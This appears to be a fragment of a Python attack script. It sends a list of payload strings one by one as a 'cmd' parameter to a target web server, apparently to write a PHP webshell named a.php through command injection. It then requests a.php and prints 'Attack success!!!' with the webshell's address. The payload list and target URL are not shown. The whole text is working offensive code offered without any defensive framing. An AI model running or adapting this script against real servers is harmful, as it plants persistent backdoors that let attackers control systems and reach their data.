​
def writeFile(payload):
    data={
    "cmd":payload
    }
    requests.post(url,data=data)
​
def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create "+p.strip())
        time.sleep(1)
​
def check():
    response = requests.get(url+"a.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is "+url+"a.php")
​
def main():
    run()
    check()
​
if __name__ == '__main__':
    main()